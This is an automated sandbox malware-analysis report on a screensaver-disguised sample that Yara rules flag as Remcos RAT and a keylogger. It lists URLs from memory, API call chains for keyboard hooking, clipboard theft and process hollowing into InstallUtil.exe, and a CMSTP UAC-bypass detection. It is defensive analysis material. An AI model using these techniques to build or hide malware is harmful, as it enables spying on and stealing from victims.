Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://ocsp.digicert.com0H
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://ocsp.msocsp.com0
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://ocsp.msocsp.com0S
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://ocspx.digicert.com0E
Source: powershell.exe, 00000004.00000002.1582955867.00000000045D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1593571792.0000000006F75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1476027682.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1582955867.0000000004481000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.1582955867.00000000045D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1593571792.0000000006F75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://www.digicert.com/CPS0~
Source: InstallUtil.exe, InstallUtil.exe, 00000009.00000002.1506345264.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com
Source: InstallUtil.exe, InstallUtil.exe, 00000009.00000002.1506345264.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.com
Source: InstallUtil.exe, 00000009.00000002.1506345264.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: InstallUtil.exe, 00000009.00000002.1506345264.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comr
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696428304750
Source: InstallUtil.exe, 00000006.00000002.1513685110.0000000000EF4000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: InstallUtil.exe, 00000009.00000002.1506345264.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb&ndcParam=QWthbWFp
Source: powershell.exe, 00000004.00000002.1582955867.0000000004481000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
Source: powershell.exe, 00000004.00000002.1590414746.00000000054ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.1590414746.00000000054ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.1590414746.00000000054ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://dl.google.com/update2/installers/icons/%7B8a69d345-d564-463c-aff1-a69d9e530f96%7D.bmp?lang=e
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5a&FrontEnd=AF
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://fp-afd-nocache.azureedge.net/apc/trans.gif?77686a33b2eafa1538ef78c3be5a5910
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://fp-afd-nocache.azureedge.net/apc/trans.gif?caa2cf97cacae25a18f577703684ee65
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?0cf92be82316943650f2ee723bc6949e
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?94fb5ac9609bcb4cda0bf8acf1827073
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?7e9591e308dbda599df1fc08720a72a3
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?c6a2869c584d2ea23c67c44abe1ec326
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
Source: powershell.exe, 00000004.00000002.1582955867.00000000045D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1593571792.0000000006F75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1493124688.0000000003D30000.00000004.00000800.00020000.00000000.sdmp, OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1514993699.0000000006180000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1493124688.0000000003D30000.00000004.00000800.00020000.00000000.sdmp, OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1514993699.0000000006180000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1493124688.0000000003D30000.00000004.00000800.00020000.00000000.sdmp, OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1514993699.0000000006180000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: powershell.exe, 00000004.00000002.1582955867.0000000004824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: InstallUtil.exe	String found in binary or memory: https://login.yahoo.com/config/login
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://maps.windows.com/windows-app-web-link
Source: powershell.exe, 00000004.00000002.1590414746.00000000054ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-04-14-10-35/PreSignInSettingsConfig.json
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=4954a0
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
Source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1493124688.0000000003D30000.00000004.00000800.00020000.00000000.sdmp, OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1514993699.0000000006180000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1493124688.0000000003D30000.00000004.00000800.00020000.00000000.sdmp, OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1476027682.0000000002C4E000.00000004.00000800.00020000.00000000.sdmp, OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1514993699.0000000006180000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1493124688.0000000003D30000.00000004.00000800.00020000.00000000.sdmp, OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1514993699.0000000006180000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: InstallUtil.exe, InstallUtil.exe, 00000009.00000002.1506345264.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: InstallUtil.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: https://www.office.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 3_2_004099E4 SetWindowsHookExA 0000000D,004099D0,00000000

3_2_004099E4

Contains functionality for read data from the clipboard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 3_2_00415B5E OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

3_2_00415B5E

Contains functionality to modify clipboard data

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00415B5E OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	3_2_00415B5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_00409E39 EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	6_2_00409E39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_00409EA1 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	6_2_00409EA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	8_2_00406DFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	8_2_00406E9F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	9_2_004068B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	9_2_004072B5

Contains functionality to read the clipboard data

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 3_2_00415B5E OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

3_2_00415B5E

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 3_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,

3_2_00409B10

Yara detected Keylogger Generic

Source: Yara match	File source: 3.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.3c73988.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.3c73988.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1493124688.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1493124688.0000000003D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3746761477.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe PID: 8840, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 9048, type: MEMORYSTR

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 3.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.3c73988.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.3c73988.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3747543577.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1493124688.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1493124688.0000000003D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3746761477.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe PID: 8840, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 9048, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 3_2_0041BD82 SystemParametersInfoW,

3_2_0041BD82

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 3.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 3.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.3c73988.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.3c73988.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.3c73988.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.3c73988.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.3c73988.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000000.00000002.1493124688.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000000.00000002.1493124688.0000000003D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000003.00000002.3746761477.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000003.00000002.3746761477.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000003.00000002.3746761477.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe PID: 8840, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: InstallUtil.exe PID: 9048, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Contains functionality to call native functions

Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Code function: 0_2_067EAA70 NtResumeThread,	0_2_067EAA70
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Code function: 0_2_067E6B78 NtProtectVirtualMemory,	0_2_067E6B78
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Code function: 0_2_067EAA69 NtResumeThread,	0_2_067EAA69
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Code function: 0_2_067E6B70 NtProtectVirtualMemory,	0_2_067E6B70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_0041742B GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,	3_2_0041742B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_0041AECC OpenProcess,NtSuspendProcess,CloseHandle,	3_2_0041AECC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_0041AEF8 OpenProcess,NtResumeProcess,CloseHandle,	3_2_0041AEF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_0040BAE3 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,	6_2_0040BAE3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_004016FD NtdllDefWindowProc_A,	8_2_004016FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_004017B7 NtdllDefWindowProc_A,	8_2_004017B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_00402CAC NtdllDefWindowProc_A,	9_2_00402CAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_00402D66 NtdllDefWindowProc_A,	9_2_00402D66

Contains functionality to shutdown / reboot the system

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 3_2_00415A51 ExitWindowsEx,LoadLibraryA,GetProcAddress,

3_2_00415A51

Detected potential crypto function

Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Code function: 0_2_02ACE418	0_2_02ACE418
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Code function: 0_2_02ACF6F0	0_2_02ACF6F0
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Code function: 0_2_02ACA720	0_2_02ACA720
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Code function: 0_2_02ACA730	0_2_02ACA730
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Code function: 0_2_02ACACC8	0_2_02ACACC8
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Code function: 0_2_067E35F8	0_2_067E35F8
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Code function: 0_2_067E5C20	0_2_067E5C20
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Code function: 0_2_067E35E8	0_2_067E35E8
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Code function: 0_2_067E5C10	0_2_067E5C10
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Code function: 0_2_0694FA78	0_2_0694FA78
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Code function: 0_2_0694E490	0_2_0694E490
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Code function: 0_2_06930006	0_2_06930006
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Code function: 0_2_06930040	0_2_06930040
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Code function: 0_2_0694E9A8	0_2_0694E9A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_0043D04B	3_2_0043D04B
